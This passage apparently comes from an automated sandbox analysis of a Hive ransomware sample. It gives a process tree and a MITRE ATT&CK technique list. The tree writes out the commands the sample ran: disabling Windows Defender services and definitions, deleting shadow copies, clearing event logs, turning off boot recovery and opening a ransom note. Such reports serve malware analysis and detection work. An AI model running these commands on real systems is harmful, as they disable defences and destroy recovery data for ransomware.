  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:5280
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:3808
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:4744
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:644
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:832
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:6076
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4552
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4636
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4932
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:4648
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:3904
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:5996
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:3436
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:5140
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:5860
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2192
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2652
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:5468
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:1064
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:4880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2784
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3576
- C:\Windows\SYSTEM32\notepad.exe
  notepad.exe C:\etrU_HOW_TO_DECRYPT.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:7060
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe"
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7108
- - C:\Windows\system32\PING.EXE
    ping.exe -n 5 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3628

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2208

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" display.dll,ShowAdapterSettings 0
1⤵
PID:3084

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5272

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\etrU_HOW_TO_DECRYPT.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3204

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2804
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:4868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x124,0x128,0x12c,0xf4,0x130,0x7ffb5d5fdcf8,0x7ffb5d5fdd04,0x7ffb5d5fdd10
  2⤵
  PID:4276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2024,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2008 /prefetch:2
  2⤵
  PID:3364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2008,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2192 /prefetch:3
  2⤵
  PID:5772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2416,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2428 /prefetch:8
  2⤵
  PID:836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:4864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3556,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3576 /prefetch:1
  2⤵
  PID:5364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4452 /prefetch:2
  2⤵
  PID:2604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3976,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4736 /prefetch:1
  2⤵
  PID:1044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4996,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4980 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5056,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  PID:840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5536,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:5720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=6084,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:2260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3640,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:3956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5976,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4796 /prefetch:1
  2⤵
  PID:3564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6012,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4860 /prefetch:1
  2⤵
  PID:2956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=240,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5112 /prefetch:8
  2⤵
  PID:1376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5520,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3560 /prefetch:8
  2⤵
  PID:2832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4780,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5700 /prefetch:8
  2⤵
  PID:840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6068,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6316 /prefetch:8
  2⤵
  PID:1728
- C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.7.exe
  "C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.7.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  PID:3956
- - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5948
  - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
      "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks whether UAC is enabled
      Checks processor information in registry
      Suspicious use of SetWindowsHookEx
      PID:1632
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2548 -parentBuildID 20250303093702 -prefsHandle 2516 -prefMapHandle 2508 -prefsLen 21011 -prefMapSize 252221 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {b50040a3-caa3-4aaa-8be7-f88b7ee3fe86} 1632 gpu
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6000
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:ac8710ac2008b98b603485fbf944d580a699eead9e227209923ec159b1 +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 1632 DisableNetwork 1
        5⤵
        Executes dropped EXE
        
        PID:5324
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2000 -childID 1 -isForBrowser -prefsHandle 2280 -prefMapHandle 2276 -prefsLen 21821 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ab249aa5-3d0f-4e02-b79a-03d6db32a416} 1632 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4308
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3132 -childID 2 -isForBrowser -prefsHandle 3124 -prefMapHandle 3088 -prefsLen 22591 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a53dd272-9224-4d84-a7f9-e39a2c649e62} 1632 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5216
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3732 -childID 3 -isForBrowser -prefsHandle 3340 -prefMapHandle 3344 -prefsLen 22704 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {fe5120a9-870f-4427-9bd8-ea3781f95a41} 1632 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4424
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1936 -parentBuildID 20250303093702 -sandboxingKind 0 -prefsHandle 3460 -prefMapHandle 3392 -prefsLen 25298 -prefMapSize 252221 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {f0afcdca-7bdb-4192-9f80-2019f063b7ba} 1632 utility
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:5504
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1900 -parentBuildID 20250303093702 -prefsHandle 4144 -prefMapHandle 4120 -prefsLen 25413 -prefMapSize 252221 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {d0925bd0-c4ef-4126-8634-a9efaa0d3c11} 1632 rdd
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2072
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2372 -childID 4 -isForBrowser -prefsHandle 4000 -prefMapHandle 4004 -prefsLen 24349 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7b23cf23-f17d-48b8-929b-2ba4190371c6} 1632 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6512
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4396 -childID 5 -isForBrowser -prefsHandle 4404 -prefMapHandle 4408 -prefsLen 24349 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {00448ef5-a8d4-462c-a016-1e90cf51230d} 1632 tab
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6544
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4592 -childID 6 -isForBrowser -prefsHandle 3376 -prefMapHandle 3268 -prefsLen 24349 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {555e5f79-3468-45cf-8d33-be30f754b938} 1632 tab
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6576
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=5252 -childID 7 -isForBrowser -prefsHandle 5244 -prefMapHandle 5240 -prefsLen 24491 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {99079ff1-650f-4094-ae88-8d328f3a9884} 1632 tab
        5⤵
        Executes dropped EXE
        
        PID:6264
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3080 -childID 8 -isForBrowser -prefsHandle 2328 -prefMapHandle 3272 -prefsLen 24769 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {6f1e1fb1-f0d4-4054-ba40-a0370bb65f4a} 1632 tab
        5⤵
        Executes dropped EXE
        
        PID:648
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2188 -childID 9 -isForBrowser -prefsHandle 1904 -prefMapHandle 2244 -prefsLen 24769 -prefMapSize 252221 -jsInitHandle 1396 -jsInitLen 234780 -parentBuildID 20250303093702 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {533b47a9-5bfd-4e22-a40b-3fe3f2effcbd} 1632 tab
        5⤵
        Executes dropped EXE
        
        PID:6032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5500,i,10149103274116842105,12768624347989459782,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5784 /prefetch:8
  2⤵
  PID:4428

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery